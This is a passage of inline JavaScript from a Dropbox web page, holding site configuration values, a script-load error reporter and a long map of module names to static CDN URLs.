"TOKEN": "8j8BaT-RNXpqPrZXN5bmAKpD", "SVN_REV": "3306785450", "date_format": "M/d/yyyy", "MAX_TEXT_FILE_SIZE_B": "4194304", "static_url_moxie_swf": "https://dt8kf6553cww8.cloudfront.net/static/swf/Moxie-vflz978zN.swf", "USER_LOCALE": "en", "sess_id": "311064460198519621729641865408209193887", "referrer": "", "quicksend_enabled": 0, "LOCALES": [["en", "English"], ["de", "Deutsch"], ["es", "Espa\u00f1ol (Latinoam\u00e9rica)"], ["es_ES", "Espa\u00f1ol (Espa\u00f1a)"], ["fr", "Fran\u00e7ais"], ["id", "Bahasa Indonesia"], ["it", "Italiano"], ["ja", "\u65e5\u672c\u8a9e"], ["ko", "\ud55c\uad6d\uc5b4"], ["ms", "Bahasa Malaysia"], ["pl", "Polski"], ["pt_BR", "Portugu\u00eas (Brasil)"], ["ru", "P\u0443\u0441\u0441\u043a\u0438\u0439"], ["zh_CN", "\u4e2d\u6587\uff08\u7b80\u4f53\uff09"], ["zh_TW", "\u4e2d\u6587\uff08\u7e41\u9ad4\uff09"]], "datetime_format": "M/d/yyyy h:mm a", "ROLE_PHOTOS": "photos", "uid": "", "TIMEZONE_OFFSET": 0, "NOTSERVER": "notify1.dropbox.com:80", "THREE_ITEM_LIST": "%(x)s, %(y)s, and %(z)s", "ROLE_WORK": "work", "root_ns": 0, "DELETE_ON_UNLINK_OLD_CLIENT": 2, "DOC_PREVIEW_UNAVAILABLE": 1, "team_name": "", "WEB_TIMING_ENABLED": 1, "DOC_PREVIEW_AVAILABLE": 0, "upload_debug": false, "ROLE_PARAM": "role", "static_url_video_overlay": "https://dt8kf6553cww8.cloudfront.net/static/images/icons/video_overlay-vfld7VbHa.png", "ROLE_PERSONAL": "personal", "email": "", "GANDALF_PANEL": 0, "static_url_swfupload_swf": "https://dt8kf6553cww8.cloudfront.net/static/swf/swfupload-vfl8U9T2v.swf", "CPROFILE_PARAMETER": "", "EMAIL_VERIFIED": 0, "PUBSERVER": "dl.dropboxusercontent.com", "time_format": "h:mm a", "IS_SPDY": 0, "work_email": "", "PDF_PREVIEW_MODE": null, "MAX_DOC_FILE_SIZE_B": "20971520", "UID_PARAM_NAME": "_subject_uid", "send_a_copy_enabled": 0, "WEBSERVER": "www.dropbox.com", "static_url_syntax_js": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/syntax-vflpNqebu.js", "WIT_VERSION": 6, "FACEBOOK_APP_ID": "210019893730", "CPROFILE_ENABLED": 0, "block": "dl-web.dropbox.com"};</script><script type="text/javascript">
window.LoadedJsSuccessfully = false;
if (window.addEventListener) {
window.addEventListener('load', function() {
window.setTimeout(function() {
if (!window.LoadedJsSuccessfully) {
var url = encodeURIComponent(window.location.href);
new Image().src = '/jse?e=failed+to+load+script&loc=' + url + '&f=' + url;
}
}, 5000);
}, false);
}
</script><script type="text/javascript">window.VFL_PREFIX = "https://dt8kf6553cww8.cloudfront.net/static/"; window.REQUIRE_JS_PATHS = {"teams/change_team_member_email_modal": "teams/change_team_member_email_modal-vfltiYie9", "browser_detection": "browser_detection-vflCe73eD", "external/codemirror-0.91/js/stringstream": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/codemirror-0.91/js/stringstream-vflNbOUg2", "saver": ["https://dt8kf6553cww8.cloudfront.net/static/javascript/compiled/saver-mini-vfl8I2liS", "https://www.dropboxstatic.com/static/javascript/compiled/saver-mini-vfl8I2liS"], "moar_space": "moar_space-vfl-LknTi", "tests/login_form": "tests/login_form-vfl9pagbr", "mobile/help": "mobile/help-vfl3wTppS", "external/codemirror-0.91/js/select": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/codemirror-0.91/js/select-vflQ2MWFi", "external/jquery": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/jquery-vflrOa9og", "links/links": "links/links-vflbM454Y", "teams/admin_chat": "teams/admin_chat-vflocweoc", "web_interaction_logger": "web_interaction_logger-vfllTzm4G", "dropins_sdk/generic": "dropins_sdk/generic-vfl1lnov2", "complete_setup": "complete_setup-vfl-p7FMI", "browse/browse": "browse/browse-vfl0KBQ_I", "photos/mobile_photo_share_page": "photos/mobile_photo_share_page-vflFOrQUB", "widgets/endscript": "widgets/endscript-vfl_Es2mq", "dropins/desktop_chooser": "dropins/desktop_chooser-vflDuICeQ", "browse/browse_actions": "browse/browse_actions-vflUPnbb1", "external/timeline/timeline_2.3.0/timeline_ajax/simile-ajax-bundle": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/timeline/timeline_2.3.0/timeline_ajax/simile-ajax-bundle-vflTUy7h8", "photos/photos_tour": "photos/photos_tour-vflFiEJ1Z", "dropins/universal_chooser": "dropins/universal_chooser-vfl8JBPA9", "components/login_or_register": "components/login_or_register-vfl5J6V8O", "external/timeline/timeline_2.3.0/timeline_js/scripts/l10n/nl/labellers": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/timeline/timeline_2.3.0/timeline_js/scripts/l10n/nl/labellers-vfl6XBI6t", "timezone": "timezone-vfl-wyFcA", "external/timeline/timeline_2.3.0/timeline_js/scripts/l10n/de/timeline": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/timeline/timeline_2.3.0/timeline_js/scripts/l10n/de/timeline-vfl1YoxID", "developers_dropins": "developers_dropins-vflzz5iJH", "control/change_email": "control/change_email-vfluxhxIZ", "teams/invite": "teams/invite-vflaY43Yi", "external/timeline/timeline_2.3.0/timeline_js/scripts/l10n/de/labellers": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/timeline/timeline_2.3.0/timeline_js/scripts/l10n/de/labellers-vfly3_J7m", "tests/sso_login_checks_test": "tests/sso_login_checks_test-vfl1uDGNH", "external/timeline/timeline_2.3.0/timeline_js/scripts/l10n/it/timeline": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/timeline/timeline_2.3.0/timeline_js/scripts/l10n/it/timeline-vflSGPpNM", "external/timeline/timeline_2.3.0/timeline_ajax/scripts/signal": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/timeline/timeline_2.3.0/timeline_ajax/scripts/signal-vfly0smhS", "mobile/forms": "mobile/forms-vflAtO17v", "control/restore": "control/restore-vflVK44ew", "widgets/db_calendar": "widgets/db_calendar-vflVwan-E", "teams/handle_pricing_table": "teams/handle_pricing_table-vflbkoQOa", "util": "util-vfl159ZSR", "print": "print-vflZtvqpl", "external/codemirror-0.91/contrib/scheme/js/parsescheme": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/codemirror-0.91/contrib/scheme/js/parsescheme-vflCn3g1v", "admin/support": "admin/support-vflhTnzIn", "admin/teams": "admin/teams-vflrjru5f", "widgets/spinner": "widgets/spinner-vflii0syQ", "connect_v3": "connect_v3-vflXoGkIw", "dropboxapi": ["https://dt8kf6553cww8.cloudfront.net/static/api/1/dropbox-vflL-aNrY", "https://www.dropboxstatic.com/static/api/1/dropbox-vflL-aNrY"], "control/verify_email_modal": "control/verify_email_modal-vflgGtDRF", "sharing/shmodal_panes": "sharing/shmodal_panes-vflnH7W8J", "dropins/multi_login_iframe": "dropins/multi_login_iframe-vflU79nN-", "control/help": "control/help-vflRf9kIR", "security_tab": "security_tab-vfl4ggbl7", "upload": "upload-vflheAjFE", "external/braintree": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/braintree-vfl4-cBUl", "external/timeline/timeline_2.3.0/timeline_js/scripts/l10n/zh/labellers": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/timeline/timeline_2.3.0/timeline_js/scripts/l10n/zh/labellers-vflyIqOt8", "external/modernizr": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/modernizr-vflTot8RG", "date_util": "date_util-vfl1euJ9z", "contacts/importer": "contacts/importer-vflRCw2SI", "external/timeline/timeline_2.3.0/timeline_ajax/simile-ajax-api": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/timeline/timeline_2.3.0/timeline_ajax/simile-ajax-api-vflo5IzV7", "external/timeline/timeline_2.3.0/timeline_js/scripts/l10n/vi/timeline": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/timeline/timeline_2.3.0/timeline_js/scripts/l10n/vi/timeline-vflkac1Si", "external/common_passwords": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/common_passwords-vfliZ-81G", "browse/flex_column": "browse/flex_column-vflTCtJzs", "file_events": "file_events-vflKuVeX3", "teams/admin_table": "teams/admin_table-vfl7KiM5w", "external/codemirror-0.91/js/undo": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/codemirror-0.91/js/undo-vflcKMw73", "external/prettify/lang-clj": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/prettify/lang-clj-vflRXDAdc", "sharing/modals": "sharing/modals-vflrweCob", "branding": "branding-vflxfNpJF", "control/select_role_modal": "control/select_role_modal-vflnpBaWm", "control/password_change": "control/password_change-vflKETfKG", "developers_language_switcher": "developers_language_switcher-vfl4jxc7h", "widgets/undo_action": "widgets/undo_action-vflH9BPn_", "audio_player": "audio_player-vfl8nHXn7", "analytics": "analytics-vfl-pZP3F", "external/html5shiv": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/html5shiv-vflMALGFj", "widgets/jump_watcher": "widgets/jump_watcher-vflp8HrCl", "tutorial_common": "tutorial_common-vflkt7DXs", "external/codemirror-0.91/contrib/csharp/js/parsecsharp": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/codemirror-0.91/contrib/csharp/js/parsecsharp-vflr1KC17", "debug_panel": "debug_panel-vfl73B9be", "download": "download-vflSEaJz2", "teams/add_event_title": "teams/add_event_title-vflHPiR-E", "dropins/universal_saver": "dropins/universal_saver-vfl2ghtP5", "jquery/endscript": "jquery/endscript-vfldUt_eD", "index": "index-vflo_xt1d", "admin/changesets": "admin/changesets-vflV7oBfO", "web_timing_logger": "web_timing_logger-vflHX-Pon", "external/codemirror-0.91/contrib/plsql/js/parseplsql": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/codemirror-0.91/contrib/plsql/js/parseplsql-vflvj2umu", "external/codemirror-0.91/contrib/ometa/js/parseometa": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/codemirror-0.91/contrib/ometa/js/parseometa-vflOisWRW", "external/codemirror-0.91/contrib/java/js/parsejava": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/codemirror-0.91/contrib/java/js/parsejava-vflFl2VPZ", "user": "user-vfl7v0Bl_", "external/timeline/timeline_2.3.0/timeline_js/scripts/l10n/nl/timeline": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/timeline/timeline_2.3.0/timeline_js/scripts/l10n/nl/timeline-vfl06PRm-", "external/timeline/timeline_2.3.0/timeline_js/scripts/l10n/es/labellers": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/timeline/timeline_2.3.0/timeline_js/scripts/l10n/es/labellers-vflPbquVY", "business": "business-vfll1rLr8", "control/news": "control/news-vflY7INgC", "widgets/db_bubble": "widgets/db_bubble-vfl-phzeA", "sharing/sharing_model": "sharing/sharing_model-vflbfdKRv", "external/timeline/timeline_2.3.0/timeline_js/scripts/l10n/en/labellers": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/timeline/timeline_2.3.0/timeline_js/scripts/l10n/en/labellers-vflU21MVS", "teams/sem_landing_page": "teams/sem_landing_page-vflXsGbf6", "external/syntax": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/syntax-vflpNqebu", "tests/uri_test": "tests/uri_test-vfl1STxUZ", "unpair_modal": "unpair_modal-vflgFuPZs", "jobs": "jobs-vfl2maeO3", "install": "install-vflHucTOe", "external/plupload_dev": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/plupload_dev-vfllSwP4V", "db_select": "db_select-vflTKU1Ra", "top_notification_bar": "top_notification_bar-vfl2-3Ozn", "sharing/team_external_share_confirm": "sharing/team_external_share_confirm-vflh9oJnw", "sharing/state": "sharing/state-vflSkcvJV", "mobile/social": "mobile/social-vflaNlqsM", "external/timeline/timeline_2.3.0/timeline_js/scripts/l10n/fr/labellers": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/timeline/timeline_2.3.0/timeline_js/scripts/l10n/fr/labellers-vfl0HRR8z", "external/video": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/video-vflOA8pnm", "photos/photos_selection": "photos/photos_selection-vflabXrza", "dropins_mobile": ["https://dt8kf6553cww8.cloudfront.net/static/javascript/compiled/dropins-mobile-mini-vfl3supBI", "https://www.dropboxstatic.com/static/javascript/compiled/dropins-mobile-mini-vfl3supBI"], "viewer_shim": "viewer_shim-vflp-X5YL", "teams/teamsetup": "teams/teamsetup-vfl9Vbm7J", "external/timeline/timeline_2.3.0/timeline_js/scripts/l10n/zh/timeline": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/timeline/timeline_2.3.0/timeline_js/scripts/l10n/zh/timeline-vfl5_vMu5", "photos/photos_collections": "photos/photos_collections-vflnptIL7", "control/promo_holder": "control/promo_holder-vflYYMqP6", "sharing/api": "sharing/api-vfl49GtZ7", "mobile/lightbox": "mobile/lightbox-vflA-eQEJ", "dropins/hostsite_callback_url": "dropins/hostsite_callback_url-vflZRWdvh", "tour": "tour-vfl4mKJm8", "control/tab_controller": "control/tab_controller-vfl9cf7p7", "widgets/browse_style_rows": "widgets/browse_style_rows-vflxcms3P", "file_viewer": "file_viewer-vfli31JEX", "sharing/shmodel": "sharing/shmodel-vflC8eWxd", "history": "history-vflunP3bN", "control/account_extras": "control/account_extras-vfllYyZ-4", "widgets/notify": "widgets/notify-vflvaZLWG", "widgets/suggestion_input": "widgets/suggestion_input-vflWMI1LG", "external/codemirror-0.91/contrib/csharp/js/tokenizecsharp": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/codemirror-0.91/contrib/csharp/js/tokenizecsharp-vflyEMudq", "business_create": "business_create-vflpZ-92d", "dropins/mobile_chooser": "dropins/mobile_chooser-vflxnZMKA", "widgets/modal": "widgets/modal-vfly4VJxC", "enable_public_folder": "enable_public_folder-vfl_SqK30", "widgets/tooltip": "widgets/tooltip-vflUpmzMV", "teams/disable_desktop_2account_modal": "teams/disable_desktop_2account_modal-vflq_uF3N", "teams/team_payments": "teams/team_payments-vflP9BLeU", "dropins/mobile_saver": "dropins/mobile_saver-vflGfwfwr", "teams/account": "teams/account-vflyJbQx9", "admin/uilibrary": "admin/uilibrary-vfliBO6Gc", "mobile/twofactor": "mobile/twofactor-vflduosRX", "control/bonus_table": "control/bonus_table-vfleQBQnL", "browse/browse_file": "browse/browse_file-vflP5wClW", "browse/context_menu": "browse/context_menu-vfl9p5JC-", "control/downgrade_reasons": "control/downgrade_reasons-vfli52Zm6", "password_strength_watcher": "password_strength_watcher-vflDwEGNw", "teams/invite_modal": "teams/invite_modal-vflT29NyR", "external/jshint": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/jshint-vflP-d-6O", "annotate_crop": "annotate_crop-vflo8hqxS", "widgets/fresh_dropdown": "widgets/fresh_dropdown-vflZ_f7c9", "teams/domains_table": "teams/domains_table-vflbpWSJT", "external/codemirror-0.91/js/parsedummy": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/codemirror-0.91/js/parsedummy-vfltunF1m", "music": "music-vflD460II", "mobile/photos": "mobile/photos-vfl2i9ib9", "external/timeline/timeline_2.3.0/timeline_js/scripts/l10n/cs/timeline": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/timeline/timeline_2.3.0/timeline_js/scripts/l10n/cs/timeline-vflpWDeA2", "widgets/sick_input": "widgets/sick_input-vfluzU2Pr", "sharing/autocompleter_contacts": "sharing/autocompleter_contacts-vflRVjk0Z", "mobile/dom_util": "mobile/dom_util-vflGe6Y8N", "control/get_space": "control/get_space-vfl1ftOD_", "libs_mobile": ["https://dt8kf6553cww8.cloudfront.net/static/javascript/compiled/libs-mobile-mini-vflRamYiX", "https://www.dropboxstatic.com/static/javascript/compiled/libs-mobile-mini-vflRamYiX"], "external/sha1": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/sha1-vflgHBuGL", "external": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external", "photos/photo_share_layout": "photos/photo_share_layout-vfl9OktKk", "i18n": "i18n-vflR0k-PG", "external/prettify/lang-ml": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/prettify/lang-ml-vfl9JZEZU", "account": "account-vflEi1r93", "sortable": "sortable-vfl5rLkKV", "teams/admin_tab": "teams/admin_tab-vflrYVKdo", "external/timeline/timeline_2.3.0/timeline_js/scripts/l10n/en/timeline": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/timeline/timeline_2.3.0/timeline_js/scripts/l10n/en/timeline-vflZsi2U5", "mobile/browse_file": "mobile/browse_file-vflipydem", "external/codemirror-0.91/js/editor": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/codemirror-0.91/js/editor-vflGqqKH6", "datastore_explorer": "datastore_explorer-vflq8kmz_", "photos/photo_event": "photos/photo_event-vflDyvXqP", "sharing/wizard_modals": "sharing/wizard_modals-vfl7ReXbe", "browse/browse_url": "browse/browse_url-vflRoo6Qj", "switch_login": "switch_login-vflbGwxT0", "lightbox_previews": "lightbox_previews-vflQuTij8", "core/uri": "core/uri-vflfkcedz", "custom_effects": "custom_effects-vfl6Qm0kC", "external/timeline/timeline_2.3.0/timeline_js/scripts/l10n/cs/labellers": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/timeline/timeline_2.3.0/timeline_js/scripts/l10n/cs/labellers-vflPd0oXf", "external/prettify/lang-n": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/prettify/lang-n-vflngnHa8", "external/pdf-js/viewer-mini": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/pdf-js/viewer-mini-vflH7Dei5", "external/prettify/lang-scala": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/prettify/lang-scala-vflWryIvk", "browse/browse_sort": "browse/browse_sort-vflMpoNcs", "external/codemirror-0.91/contrib/python/js/parsepython": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/codemirror-0.91/contrib/python/js/parsepython-vflba_lPg", "external/prettify/lang-tex": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/prettify/lang-tex-vflzDJlKS", "external/prettify/lang-apollo": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/prettify/lang-apollo-vflssc3RC", "external/timeline/timeline_2.3.0/timeline_js/scripts/l10n/tr/labellers": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/timeline/timeline_2.3.0/timeline_js/scripts/l10n/tr/labellers-vflEBWuvJ", "batch_logger": "batch_logger-vfl4b0P_h", "widgets/login_dropdown": "widgets/login_dropdown-vfljYwORz", "common/change_name": "common/change_name-vfltOyc_i", "tests/bug_reporter": "tests/bug_reporter-vflYPqix_", "twofactor": "twofactor-vfl7n3J5l", "dropins/desktop_saver": "dropins/desktop_saver-vflOV3BEe", "control/recover": "control/recover-vflXvLsas", "sharing/autocompleter_contacts_tokenizer": "sharing/autocompleter_contacts_tokenizer-vflk_ANES", "db_login_form": "db_login_form-vfl_l6v83", "tests/util_test": "tests/util_test-vfl2uwOMM", "external/codemirror-0.91/contrib/xquery/js/parsexquery": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/codemirror-0.91/contrib/xquery/js/parsexquery-vfld0YbzB", "external/codemirror-0.91/js/parsexml": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/codemirror-0.91/js/parsexml-vfl5dRK-7", "tests/jquery_ext": "tests/jquery_ext-vflK0sg2u", "events": "events-vfl5DBKwC", "external/timeline/timeline_2.3.0/timeline_js/scripts/l10n/ru/timeline": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/timeline/timeline_2.3.0/timeline_js/scripts/l10n/ru/timeline-vflinhUOK", "profile": "profile-vflLMCDc_", "mobile/upgrade": "mobile/upgrade-vflAi_0Pg", "admin/help": "admin/help-vfl5Y4PsW", "progress_watcher": "progress_watcher-vflItlamR", "external/codemirror-0.91/contrib/php/js/parsephp": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/codemirror-0.91/contrib/php/js/parsephp-vflmgjmJA", "external/codemirror-0.91/js/parsejavascript": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/codemirror-0.91/js/parsejavascript-vfl7iPw7q", "endscript": "endscript-vflBQ8JoK", "require_config": "require_config-vflsfoytV", "external/prettify/lang-css": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/prettify/lang-css-vflkUNl-k", "pseudo_local_storage": "pseudo_local_storage-vflFDeRIP", "sharing/team_shared_folder_invite_controller": "sharing/team_shared_folder_invite_controller-vflE8hqa2", "core/ordered_dictionary": "core/ordered_dictionary-vflO3CZPU", "emstring": "emstring-vflAlxBbx", "external/timeline/timeline_2.3.0/timeline_js/timeline-bundle": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/timeline/timeline_2.3.0/timeline_js/timeline-bundle-vflXwgj96", "widgets/title_bubble": "widgets/title_bubble-vflZ77JrI", "annotation": "annotation-vfl2oQO3-", "photos/photo_obj": "photos/photo_obj-vflE3I58y", "external/codemirror-0.91/contrib/sql/js/parsesql": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/codemirror-0.91/contrib/sql/js/parsesql-vfljZKTid", "external/iphone": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/iphone-vflkl7_tc", "file_preview_pending": "file_preview_pending-vfl9HiC8G", "dropins_sdk/v2": "dropins_sdk/v2-vfli5tBlv", "dropins_sdk/v1": "dropins_sdk/v1-vflWYhn4L", "external/prettify/lang-sql": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/prettify/lang-sql-vfloOXjgL", "db_local_storage": "db_local_storage-vflBabw4f", "external/codemirror-0.91/contrib/xquery/js/tokenizexquery": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/codemirror-0.91/contrib/xquery/js/tokenizexquery-vflLuA8go", "widgets/register_form": "widgets/register_form-vflzNfkZ-", "photos/photos": "photos/photos-vflhFXxqS", "tests/cash_util_test": "tests/cash_util_test-vfl5r46ED", "langs_page": "langs_page-vflN12vXg", "sharing/contact_types": "sharing/contact_types-vfli65w_m", "jquery_extensions": "jquery_extensions-vflG0VzrO", "external/codemirror-0.91/js/parsehtmlmixed": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/codemirror-0.91/js/parsehtmlmixed-vflobyvkb", "admin/server_vars": "admin/server_vars-vflK1mPMM", "external/prettify/lang-hs": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/prettify/lang-hs-vflmhToOJ", "sharing/sf_views": "sharing/sf_views-vflxJ4fUe", "external/timeline/timeline_2.3.0/timeline_js/scripts/l10n/vi/labellers": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/timeline/timeline_2.3.0/timeline_js/scripts/l10n/vi/labellers-vflXbVxFU", "exc_reporting": "exc_reporting-vfloiXfLS", "widgets/role_picker": "widgets/role_picker-vflYAjnWi", "developers_sdk_saver_logger": "developers_sdk_saver_logger-vflUrmov0", "external/codemirror-0.91/contrib/php/js/parsephphtmlmixed": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/codemirror-0.91/contrib/php/js/parsephphtmlmixed-vfl6MWgTz", "tests/ajax_form": "tests/ajax_form-vfldqro8r", "widgets/tree_view": "widgets/tree_view-vflBqc3lQ", "locale_selector": "locale_selector-vflMU0wx8", "fileops": "fileops-vflvQM6Hw", "teams/teams_pricing_slider": "teams/teams_pricing_slider-vflLQI-97", "forms": "forms-vflgjMygq", "video_util": "video_util-vfl6MFffS", "external/codemirror-0.91/js/util": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/codemirror-0.91/js/util-vflJ6aj2l", "kwargs": "kwargs-vflVKZLC7", "control/install": "control/install-vflQ5p5Bx", "logger": "logger-vflXdXO8C", "sharing/util": "sharing/util-vflNBMCet", "external/jquery.qrcode.min": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/jquery.qrcode.min-vflrxBXjD", "external/prettify/lang-vb": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/prettify/lang-vb-vfl1vaEjC", "widgets/ajax_form": "widgets/ajax_form-vflOkA10-", "drag_scroll": "drag_scroll-vfleJIXp-", "external/sorttable": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/sorttable-vflvQVjIl", "tests/cache_test": "tests/cache_test-vflfG9u5X", "user_marketing_stories": "user_marketing_stories-vflOml1tB", "shared_util": "shared_util-vflbBYJxw", "external/timeline/timeline_2.3.0/timeline_js/scripts/l10n/ru/labellers": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/timeline/timeline_2.3.0/timeline_js/scripts/l10n/ru/labellers-vfl0a4_sU", "external/codemirror-0.91/contrib/php/js/tokenizephp": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/codemirror-0.91/contrib/php/js/tokenizephp-vfl_6JJjd", "photos/photo_share_page": "photos/photo_share_page-vflPi4FzB", "admin/dmca_dashboard": "admin/dmca_dashboard-vflQxeM6Q", "look3": "look3-vfljTW3FX", "admin/watchdog": "admin/watchdog-vflEwAzxu", "libs": ["https://dt8kf6553cww8.cloudfront.net/static/javascript/compiled/libs-mini-vfljfBv6h", "https://www.dropboxstatic.com/static/javascript/compiled/libs-mini-vfljfBv6h"], "external/codemirror-0.91/css/font": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/codemirror-0.91/css/font-vflls2Gft", "external/codemirror-0.91/js/unittests": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/codemirror-0.91/js/unittests-vflG9sKld", "teams/marketo_form": "teams/marketo_form-vflLSLmWN", "browse/browse_jump": "browse/browse_jump-vfl8RsCpa", "file_preview": "file_preview-vflgwX8K4", "mobile/shmodel_preview": "mobile/shmodel_preview-vflU7rctL", "photos/photo_timeline": "photos/photo_timeline-vflFVoYoE", "photos/photos_logger": "photos/photos_logger-vflplsrvJ", "tests/kwargs": "tests/kwargs-vfl5CQnUz", "teams/member_requests_confirm_modal": "teams/member_requests_confirm_modal-vfljfS5rk", "external/timeline/timeline_2.3.0/timeline_js/scripts/l10n/se/timeline": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/timeline/timeline_2.3.0/timeline_js/scripts/l10n/se/timeline-vfl-hw8Ma", "annotate_qual": "annotate_qual-vflg9l-u6", "widgets/locale_selector_modal": "widgets/locale_selector_modal-vflzz6iBj", "teams/team": "teams/team-vflqRIoNT", "payments": "payments-vfluB-62X", "touch_util": "touch_util-vflrKz8Fl", "external/timeline/timeline_2.3.0/timeline_js/timeline-api": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/timeline/timeline_2.3.0/timeline_js/timeline-api-vflJybO4S", "async": "async-vflXeTSiy", "sharing/hidden_input": "sharing/hidden_input-vflVJ548v", "external/swfobject": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/swfobject-vfljC7EvC", "mobile/links": "mobile/links-vflr-YzbZ", "sharing/sf_access_type": "sharing/sf_access_type-vflwAzRom", "templates": "templates-vfly8tgQG", "developers_dropins2": "developers_dropins2-vflsKjiX3", "widgets/sprite": "widgets/sprite-vfl3x8dTC", "custom_domains": "custom_domains-vfleQ1jfV", "external/prettify/lang-lisp": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/prettify/lang-lisp-vflNhNa5v", "sharing/sharing": "sharing/sharing-vflQ1ZNjy", "external/timeline/timeline_2.3.0/timeline_js/scripts/l10n/it/labellers": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/timeline/timeline_2.3.0/timeline_js/scripts/l10n/it/labellers-vflzplwsL", "snapshots": "snapshots-vflhaA8AM", "browse/browse_clipboard": "browse/browse_clipboard-vflrXqP0Z", "payments_util": "payments_util-vfl14YTJj", "external/prettify/prettify": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/prettify/prettify-vflcJv8xF", "browse/browse_keys": "browse/browse_keys-vflBzCYBF", "bubble_picker": "bubble_picker-vflqU0JPx", "admin/packrat": "admin/packrat-vflv9Kfem", "home": "home-vflg07T9o", "external/underscore": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/underscore-vfl7K8tzR", "db_dropdown": "db_dropdown-vflVNdhsd", "admin/fix_samsung_deletions": "admin/fix_samsung_deletions-vflAmjzWe", "browse/file_search": "browse/file_search-vfl0EBmCt", "notification_feed": "notification_feed-vflnP4VQT", "browse/update_events": "browse/update_events-vfllZylWA", "external/jquery_ui": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/jquery_ui-vfl9qjowS", "sharing/forms": "sharing/forms-vflN2zJt1", "control/login_and_register": "control/login_and_register-vfliCFz4B", "teams/update_billing_info_modal": "teams/update_billing_info_modal-vfl4BDiVp", "external/timeline/timeline_2.3.0/timeline_js/scripts/l10n/tr/timeline": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/timeline/timeline_2.3.0/timeline_js/scripts/l10n/tr/timeline-vflkm5fNv", "external/iphonelib": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/iphonelib-vfl2emqyU", "external/jobvite": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/jobvite-vflBqjvlu", "external/jquery_noconflict": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/jquery_noconflict-vflrGziQ2", "external/codemirror-0.91/js/mirrorframe": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/codemirror-0.91/js/mirrorframe-vflmUSSe7", "thumb_loader": "thumb_loader-vfl5A5xYO", "photos/photo_collection_obj": "photos/photo_collection_obj-vflAE01ZL", "sharing/options_modal": "sharing/options_modal-vflX-K9Vs", "foshmodal": "foshmodal-vflr0f1pS", "multiaccount_login": "multiaccount_login-vflf-7gDV", "revisions_diff": 